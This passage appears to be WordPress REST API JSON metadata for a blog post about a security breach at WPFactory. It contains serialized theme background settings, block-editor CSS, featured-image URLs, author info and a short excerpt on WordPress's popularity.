on\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"tablet\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"mobile\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}}"],"ast-content-background-meta":["a:3:{s:7:\"desktop\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"tablet\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"mobile\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}}"],"footnotes":[""],"_elementor_edit_mode":[""],"_elementor_template_type":[""],"_elementor_data":[""],"_elementor_conditions":["a:0:{}"],"_wp_old_slug":["security-breach-at-wpfactory-170000-wordpress-sites-potentially-exposed"],"_edit_last":["1"],"_uag_css_file_name":["uag-css-24971.css"],"_uag_page_assets":["a:9:{s:3:\"css\";s:10032:\".wp-block-uagb-advanced-heading h1,.wp-block-uagb-advanced-heading h2,.wp-block-uagb-advanced-heading h3,.wp-block-uagb-advanced-heading h4,.wp-block-uagb-advanced-heading h5,.wp-block-uagb-advanced-heading h6,.wp-block-uagb-advanced-heading p,.wp-block-uagb-advanced-heading div{word-break:break-word}.wp-block-uagb-advanced-heading .uagb-heading-text{margin:0}.wp-block-uagb-advanced-heading .uagb-desc-text{margin:0}.wp-block-uagb-advanced-heading .uagb-separator{font-size:0;border-top-style:solid;display:inline-block;margin:0 0 10px 0}.wp-block-uagb-advanced-heading .uagb-highlight{color:#f78a0c;border:0;transition:all .3s ease}.uag-highlight-toolbar{border-left:0;border-top:0;border-bottom:0;border-radius:0;border-right-color:#1e1e1e}.uag-highlight-toolbar .components-button{border-radius:0;outline:none}.uag-highlight-toolbar .components-button.is-primary{color:#fff}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.uag-blocks-common-selector{z-index:var(--z-index-desktop) !important}@media(max-width: 976px){.uag-blocks-common-selector{z-index:var(--z-index-tablet) !important}}@media(max-width: 767px){.uag-blocks-common-selector{z-index:var(--z-index-mobile) !important}}.wp-block-uagb-image{display:flex}.wp-block-uagb-image__figure{position:relative;display:flex;flex-direction:column;max-width:100%;height:auto;margin:0}.wp-block-uagb-image__figure img{height:auto;display:flex;max-width:100%;transition:box-shadow .2s ease}.wp-block-uagb-image__figure>a{display:inline-block}.wp-block-uagb-image__figure figcaption{text-align:center;margin-top:.5em;margin-bottom:1em}.wp-block-uagb-image .components-placeholder.block-editor-media-placeholder .components-placeholder__instructions{align-self:center}.wp-block-uagb-image--align-left{text-align:left}.wp-block-uagb-image--align-right{text-align:right}.wp-block-uagb-image--align-center{text-align:center}.wp-block-uagb-image--align-full .wp-block-uagb-image__figure{margin-left:calc(50% - 50vw);margin-right:calc(50% - 50vw);max-width:100vw;width:100vw;height:auto}.wp-block-uagb-image--align-full .wp-block-uagb-image__figure img{height:auto;width:100% !important}.wp-block-uagb-image--align-wide .wp-block-uagb-image__figure img{height:auto;width:100%}.wp-block-uagb-image--layout-overlay__color-wrapper{position:absolute;left:0;top:0;right:0;bottom:0;opacity:.2;background:rgba(0,0,0,.5);transition:opacity .35s ease-in-out}.wp-block-uagb-image--layout-overlay-link{position:absolute;left:0;right:0;bottom:0;top:0}.wp-block-uagb-image--layout-overlay .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{opacity:1}.wp-block-uagb-image--layout-overlay__inner{position:absolute;left:15px;right:15px;bottom:15px;top:15px;display:flex;align-items:center;justify-content:center;flex-direction:column;border-color:#fff;transition:.35s ease-in-out}.wp-block-uagb-image--layout-overlay__inner.top-left,.wp-block-uagb-image--layout-overlay__inner.top-center,.wp-block-uagb-image--layout-overlay__inner.top-right{justify-content:flex-start}.wp-block-uagb-image--layout-overlay__inner.bottom-left,.wp-block-uagb-image--layout-overlay__inner.bottom-center,.wp-block-uagb-image--layout-overlay__inner.bottom-right{justify-content:flex-end}.wp-block-uagb-image--layout-overlay__inner.top-left,.wp-block-uagb-image--layout-overlay__inner.center-left,.wp-block-uagb-image--layout-overlay__inner.bottom-left{align-items:flex-start}.wp-block-uagb-image--layout-overlay__inner.top-right,.wp-block-uagb-image--layout-overlay__inner.center-right,.wp-block-uagb-image--layout-overlay__inner.bottom-right{align-items:flex-end}.wp-block-uagb-image--layout-overlay__inner .uagb-image-heading{color:#fff;transition:transform .35s,opacity .35s ease-in-out;transform:translate3d(0, 24px, 0);margin:0;line-height:1em}.wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{width:30%;border-top-width:2px;border-top-color:#fff;border-top-style:solid;margin-bottom:10px;opacity:0;transition:transform .4s,opacity .4s ease-in-out;transform:translate3d(0, 30px, 0)}.wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity:0;overflow:visible;color:#fff;transition:transform .45s,opacity .45s ease-in-out;transform:translate3d(0, 35px, 0)}.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-heading,.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-separator,.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-caption{opacity:1;transform:translate3d(0, 0, 0)}.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure img,.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure .wp-block-uagb-image--layout-overlay__color-wrapper{transform:scale(1);transition:transform .35s ease-in-out}.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure:hover img,.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{transform:scale(1.05)}.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure img,.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure .wp-block-uagb-image--layout-overlay__color-wrapper{width:calc(100% + 40px) !important;max-width:none !important;transform:translate3d(-40px, 0, 0);transition:transform .35s ease-in-out}.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure:hover img,.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{transform:translate3d(0, 0, 0)}.wp-block-uagb-image--effect-grayscale img{filter:grayscale(0%);transition:.35s ease-in-out}.wp-block-uagb-image--effect-grayscale:hover img{filter:grayscale(100%)}.wp-block-uagb-image--effect-blur img{filter:blur(0);transition:.35s ease-in-out}.wp-block-uagb-image--effect-blur:hover img{filter:blur(3px)}.uagb-block-e6f939b3.wp-block-uagb-image--layout-default figure img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure figcaption{font-style: normal;align-self: center;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay figure img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__color-wrapper{opacity: 0.2;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner{left: 15px;right: 15px;top: 15px;bottom: 15px;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-heading{font-style: normal;color: #fff;opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-heading a{color: #fff;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity: 0;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{width: 30%;border-top-width: 2px;border-top-color: #fff;opacity: 0;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-default figure:hover img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay figure:hover img{box-shadow: 0px 0px 0 #00000070;}@media only screen and (max-width: 976px) {.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}}@media only screen and (max-width: 767px) {.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}}\";s:2:\"js\";s:0:\"\";s:18:\"current_block_list\";a:18:{i:0;s:14:\"core\/paragraph\";i:1;s:12:\"core\/heading\";i:2;s:9:\"core\/html\";i:3;s:9:\"core\/list\";i:4;s:14:\"core\/list-item\";i:5;s:21:\"uagb\/advanced-heading\";i:6;s:11:\"core\/search\";i:7;s:10:\"core\/group\";i:8;s:17:\"core\/latest-posts\";i:9;s:20:\"core\/latest-comments\";i:10;s:13:\"core\/archives\";i:11;s:15:\"core\/categories\";i:12;s:10:\"uagb\/image\";i:13;s:11:\"core\/spacer\";i:14;s:30:\"woocommerce\/product-categories\";i:15;s:18:\"core\/legacy-widget\";i:16;s:10:\"core\/image\";i:17;s:14:\"core\/shortcode\";}s:8:\"uag_flag\";b:1;s:11:\"uag_version\";s:10:\"1778451505\";s:6:\"gfonts\";a:0:{}s:10:\"gfonts_url\";s:0:\"\";s:12:\"gfonts_files\";a:0:{}s:14:\"uag_faq_layout\";b:0;}"]},"uagb_featured_image_src":{"full":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach.jpg",2000,1000,false],"thumbnail":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-150x150.jpg",150,150,true],"medium":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-300x150.jpg",300,150,true],"medium_large":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-768x384.jpg",768,384,true],"large":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-1024x512.jpg",1024,512,true],"1536x1536":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-1536x768.jpg",1536,768,true],"2048x2048":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach.jpg",2000,1000,false],"trp-custom-language-flag":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-18x9.jpg",18,9,true]},"uagb_author_info":{"display_name":"admin","author_link":"https:\/\/www.ferberenterprises.com\/hr\/author\/admin2721\/"},"uagb_comment_info":0,"uagb_excerpt":"WordPress remains the most widely used content management system in the world, powering more than 40 percents of all websites on the internet. From small business websites and personal blogs to large enterprise platforms and e-commerce infrastructures, the CMS has become the backbone of the modern web. Its popularity stems from its flexibility, open ecosystem,&hellip;","_links":{"self":[{"href":"https:\/\/www.ferberenterprises.com\/hr\/wp-json\/wp\/v2\/posts\/24971","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ferberenterprises.com\/hr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ferberenterprises.com\/hr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/hr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/hr\/wp-json\/wp\/v2\/comments?post=24971"}],"version-history":[{"count":20,"href":"https:\/\/www.ferberenterprises.com\/hr\/wp-json\/wp\/v2\/posts\/24971\/revisions"}],"predecessor-version":[{"id":25042,"href":"https:\/\/www.ferberenterprises.com\/hr\/wp-json\/wp\/v2\/posts\/24971\/revisions\/25042"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/hr\/wp-json\/wp\/v2\/media\/24973"}],"wp:attachment":[{"href":"https:\/\/www.ferberenterprises.com\/hr\/wp-json\/wp\/v2\/media?parent=24971"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/hr\/wp-json\/wp\/v2\/categories?post=24971"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/hr\/wp-json\/wp\/v2\/tags?post=24971"}],"curies":[{"name":"radni list","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}